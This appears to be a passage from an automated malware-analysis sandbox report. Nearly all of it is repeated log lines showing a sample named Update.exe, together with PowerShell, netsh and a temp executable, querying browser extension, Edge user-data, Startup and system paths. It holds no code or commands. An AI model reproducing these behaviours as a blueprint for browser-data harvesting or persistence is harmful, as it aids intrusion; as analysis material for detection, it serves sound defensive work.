                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeQueries volume information: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
